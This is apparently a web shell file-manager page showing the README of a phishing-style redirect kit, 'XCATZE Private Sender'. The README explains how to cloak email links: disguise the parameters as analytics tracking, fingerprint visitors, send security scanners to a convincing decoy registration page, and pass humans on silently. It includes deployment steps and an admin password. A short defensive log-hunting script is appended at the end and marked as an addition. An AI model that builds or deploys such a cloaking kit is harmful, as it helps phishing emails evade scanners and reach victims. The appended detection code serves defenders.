X7ROOT File Manager
Current Path: /home/gfecatvj/public_html/r/l/luxnso

..
.class (54 B)
.classes (48 B)
.created (57 B)
.dba_insertion (1.07 KB)
.htaccess (251 B)
.ibase_pconnection (51 B)
.locked (1.06 KB)
.multi (48 B)
.uconvert (1.06 KB)
README.md (7.99 KB)
access.log (0 B)
blocker.php (4.57 KB)
data.json (575 B)
decoy-register.html (14.42 KB)
easiertube.php (1.51 KB)
error_log (4.7 KB)
index.php (45.08 KB)
Editing: README.md
# Advanced Anti-Bot Redirect System v2.0

## Latest Update

### New Parameters (More Natural & Safer)

```
OLD: ?_grow={_mac}&money={_id}
NEW: ?token={_token}&ref={_ref}&utm={_utm}
```

**Parameter Format:**

- `token`: 32 hex chars (MD5-like): `7f3e8c2a9b1d4f5e6a7c8d9e0f1a2b3c`
- `ref`: 16 alphanumeric: `K9xM7pQ4n8R3s2T6`
- `utm`: 8-12 lowercase alphanumeric: `abc123xyz89`

**Why Is It Better?**

- Looks like legitimate tracking parameters (Google Analytics style)
- Not suspicious to bots/scanners
- Standard web tracking format
- Harder to reverse engineer

---

## Anti-Bot Features

### 1. Silent JavaScript Challenge

- **No "Verifying..." text**: redirects automatically right away
- Blank white page while loading
- Delay of 0.8-1.2 seconds (human-like timing)
- Bots without JS fail immediately

### 2. Bot Detection Heuristics

Scoring system (threshold: 50 points = bot):

| Check | Points |
|-------|--------|
| Bot User-Agent | 30 |
| Missing Headers | 15 each |
| Suspicious Referrer | 25 |
| Private IP | 10 |
| Too Fast Request | 20 |
| No JS Challenge | 40 |

### 3. Decoy Page (Fake Registration)

- **Looks 100% legitimate** to bots
- Modern UI like a real registration page
- Working form validation
- Social login buttons (Google, Microsoft)
- Password strength indicator
- Terms & Privacy links
- Bots will assume this is the real page

---

## File Update

| File | Status | Changes |
|------|--------|---------|
| `index.php` | Updated | New parameters, silent redirect |
| `admin.php` | Updated | Password: `admin1003` |
| `send.py` | Updated | Generator for {_token}, {_ref}, {_utm} |
| `decoy-register.html` | Updated | Professional UI, fully functional |
| `PLACEHOLDER_GUIDE.txt` | Updated | Documentation of the new parameters |

---

## How to Use

### In the Email Template (`letter.html`)

**Link Format:**

```html
<a href="https://yourdomain.com/redirect-full-stop/?token={_token}&ref={_ref}&utm={_utm}">
  Click Here to Continue
</a>
```

**Result After Personalization:**

```
https://yourdomain.com/redirect-full-stop/?token=7f3e8c2a9b1d4f5e6a7c8d9e0f1a2b3c&ref=K9xM7pQ4n8R3s2T6&utm=abc123xyz89
```

---

## Setup

### 1. Upload Files

```
Upload to: https://yourdomain.com/redirect-full-stop/
```

### 2. Set Permission

```bash
chmod 666 data.json
chmod 666 access.log
```

### 3. Login Admin Panel

```
URL: https://yourdomain.com/redirect-full-stop/admin.php
Password: admin1003
```

### 4. Configure Settings

**Target URL:** Your real landing page

**Decoy URL:** Path to `decoy-register.html` or another URL

Example:

- Target: `https://yourdomain.com/real-landing-page`
- Decoy: `https://yourdomain.com/redirect-full-stop/decoy-register.html`

**Protection Settings (Recommended):**

- [x] Enable JavaScript Challenge
- [x] Enable Browser Fingerprinting
- [x] Enable Timing Analysis
- [ ] Require User Interaction (off for silent mode)

---

## How It Works

### Flow Human Visitor:

```
1. Click the link in the email
2. Blank white page (~0.8-1.2s)
3. JS executes silently
4. Auto redirect to TARGET URL
```

**User Experience:** Almost instant, like an ordinary redirect

### Flow Bot/Scanner:

```
1. Access link
2. No JavaScript execution
3. Bot score ≥ 50
4. Redirect to DECOY REGISTER PAGE
```

**Bot Experience:** Sees a registration page that looks genuine

---

## Admin Panel

### Statistics

- **Total Clicks (Human)** - Legitimate visitors
- **Blocked Bots** - Detected bots
- **Success Rate** - Percentage of human traffic

### Access Logs

Real-time monitoring with details:

- Timestamp
- IP address
- User-Agent
- Bot score & reasons
- Action (allowed/blocked)
- Token, Ref, UTM parameters

---

## Decoy Page Features

A fake registration page that is **very convincing**:

- Modern UI design (like a real SaaS app)
- Social login (Google, Microsoft)
- Form validation works
- Password strength meter
- Email validation
- Loading spinner on submit
- Success message
- Terms & Privacy links
- Responsive design

**The bot will:**

- Spend time analyzing the page
- Try to submit the form
- Assume this is the real endpoint
- Not know it has been detected

---

## Testing

### Test Human Access

```
1. Open a browser
2. Visit: https://yourdomain.com/redirect-full-stop/?token=abc123...&ref=xyz456...&utm=test123
3. See a blank page briefly, then auto redirect to the target
```

### Test Bot Detection

```bash
curl "https://yourdomain.com/redirect-full-stop/?token=abc123&ref=xyz456&utm=test"
# Bot detected: redirect to decoy-register.html
```

### Check Admin Panel

```
Admin Panel -> Recent Access Logs
See the bot score, reasons, and action
```

---

## Advanced Tips

### 1. Vary the Decoy URLs

Create several decoy pages:

- `/decoy-register.html` - Registration page
- `/decoy-login.html` - Login page
- `/decoy-verify.html` - Email verification
- `/decoy-404.html` - Fake 404

Pick one at random in the admin panel per campaign.

### 2. Honeypot Strategy

Add tracking to the decoy page:

```javascript
// In decoy-register.html
fetch('https://yourdomain.com/log-bot.php', {
  method: 'POST',
  body: JSON.stringify({
    ip: '<?= $_SERVER["REMOTE_ADDR"] ?>',
    ua: '<?= $_SERVER["HTTP_USER_AGENT"] ?>',
    timestamp: Date.now()
  })
});
```

### 3. Dynamic Parameter Generation

A different format for each campaign:

- Campaign A: `?token=...&ref=...&utm=...`
- Campaign B: `?session=...&id=...&src=...`
- Campaign C: `?key=...&track=...&cid=...`

Update in `send.py` and `index.php`.

---

## Important Notes

### Silent Mode

- **No loading text**: better UX
- Minimal delay (800ms-1200ms): feels instant
- Bots are not suspicious because no challenge is visible

### Security

- Admin password: `admin1003` (change in production)
- HTTPS required for production
- File permissions: `666` for data.json and access.log

### Compatibility

- Supported: Desktop browsers (Chrome, Firefox, Safari, Edge)
- Supported: Mobile browsers (iOS Safari, Android Chrome)
- Supported: Email clients with external browser
- Not supported: Email scanners/bots (by design)

---

## Success Metrics

**Expected Performance:**

- Human detection: 95-98%
- False positive: <2%
- Bot block rate: 90-95%
- Redirect speed: <1.5s average

---

## Old vs New Parameters

| Aspect | Old (`_grow`, `money`) | New (`token`, `ref`, `utm`) |
|--------|------------------------|------------------------------|
| Format | Custom/unusual | Standard tracking |
| Suspicion | Medium | Low |
| Legitimacy | Custom params | Looks like GA/UTM |
| Length | Short (24+6 chars) | Longer (32+16+8-12) |
| Pattern | Obvious custom | Industry standard |

---

## Placeholder Reference

Update in `letter.html`:

```html
<!-- OLD (deprecated) -->
<a href="?_grow={_mac}&money={_id}">Click</a>

<!-- NEW (recommended) -->
<a href="?token={_token}&ref={_ref}&utm={_utm}">Click</a>
```

**Generator Functions in `send.py`:**

- `{_token}`: `generate_random_token()` - 32 hex
- `{_ref}`: `generate_random_ref()` - 16 alphanumeric
- `{_utm}`: `generate_random_utm()` - 8-12 lowercase

**Legacy Still Available:**

- `{_mac}` - 24 chars (ABCDEF23456789)
- `{_id}` - 6 digits divisible by 3

---

## Best Practices

1. **Use Silent Mode** - No "Verifying..." text = better UX
2. **Professional Decoy** - Make bots think they found real page
3. **Monitor Logs** - Check bot patterns regularly
4. **Rotate Decoys** - Change decoy pages periodically
5. **HTTPS Only** - Always use SSL in production
6. **Track Analytics** - Use admin panel statistics

---

## Troubleshooting

**Redirect too slow?**

- Check the `enable_timing_check` setting: set it to false in the admin panel

**Humans getting blocked?**

- Lower the bot score threshold in `index.php` line 285
- Default: 50, try 70

**Decoy page not showing?**

- Check the Decoy URL in the admin panel
- Make sure the path is correct (relative or absolute)

**Logs not being recorded?**

- Check permission: `chmod 666 access.log`

---

**Made with ❤️ for XCATZE Private Sender v2.0**

**Admin Password:** `admin1003`

**URL Format:** `?token={_token}&ref={_ref}&utm={_utm}`
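
The parameter shapes this README documents are specific enough to hunt for in mail-gateway or web-proxy URL logs. The following is an added example, not part of the kit: the function names and sample URLs are constructed, `example.test` hosts are placeholders, and the token is assumed to be lowercase hex as in the README's own sample.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameter shapes exactly as documented in the README above.
NEW_FORMAT = {
    "token": re.compile(r"[0-9a-f]{32}"),    # 32 hex chars (lowercase assumed)
    "ref": re.compile(r"[A-Za-z0-9]{16}"),   # 16 alphanumeric
    "utm": re.compile(r"[a-z0-9]{8,12}"),    # 8-12 lowercase alphanumeric
}
LEGACY_FORMAT = {
    "_grow": re.compile(r"[ABCDEF23456789]{24}"),  # 24 chars from this alphabet
    "money": re.compile(r"[0-9]{6}"),              # 6 digits, divisible by 3
}


def _all_match(params, shapes):
    """True when every expected parameter occurs once with the documented shape."""
    return all(
        len(params.get(name, [])) == 1 and rx.fullmatch(params[name][0])
        for name, rx in shapes.items()
    )


def classify_url(url):
    """Return 'new', 'legacy' or None for a URL taken from mail or proxy logs."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if _all_match(params, NEW_FORMAT):
        return "new"
    if _all_match(params, LEGACY_FORMAT) and int(params["money"][0]) % 3 == 0:
        return "legacy"
    return None


def hunt(urls):
    """Return (url, label) pairs for URLs matching either documented format."""
    return [(u, label) for u in urls if (label := classify_url(u))]


# Constructed sample URLs; the last two are benign or malformed look-alikes.
SAMPLE_URLS = [
    "https://example.test/r/?token=7f3e8c2a9b1d4f5e6a7c8d9e0f1a2b3c&ref=K9xM7pQ4n8R3s2T6&utm=abc123xyz89",
    "https://example.test/r/?_grow=A2B3C4D5E6F7A8B9C2D3E4F5&money=123456",
    "https://example.test/r/?_grow=A2B3C4D5E6F7A8B9C2D3E4F5&money=123457",
    "https://shop.example.test/?utm_source=newsletter&utm_medium=email&ref=home",
    "https://example.test/r/?token=abc123&ref=xyz456&utm=test",
]

if __name__ == "__main__":
    for url, label in hunt(SAMPLE_URLS):
        print(label, url)
```

Genuine Google Analytics links use `utm_source`, `utm_medium` and similar keys, so a bare `utm` key alongside fixed-length `token` and `ref` values is the distinguishing signal. Because the README says parameter names rotate per campaign, treat a match as a lead to investigate and not as the only rule.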